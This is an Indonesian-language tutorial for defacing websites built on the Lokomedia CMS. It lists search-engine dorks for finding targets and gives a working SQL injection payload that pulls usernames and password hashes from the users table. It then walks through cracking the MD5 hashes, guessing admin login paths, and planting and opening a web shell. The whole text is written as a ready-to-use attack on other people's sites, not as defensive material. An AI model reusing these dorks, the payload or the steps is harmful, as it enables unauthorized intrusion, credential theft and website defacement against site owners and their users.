Deface Metode SQL Lokomedia
Bahan-Bahan:
1. DORK :
A). Inurl:/statis-1-profil.html
B). Inurl:/statis-2-profil.htmlC). Inurl:/statis-3-profil.html
PLEASE READ : Jika Mau dapat site yang Vulnerabilty . Silahkan kembangkan dork
2. EXPLOIT :
- 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Langkah-Langkah :
1. Dorking di Search Engine (Google,Yahoo,Bing,dan sebagainya)
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalo vuln jadinya bakal kek gini.
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location]
itulah tutorial cara deface metode sql lokomedia
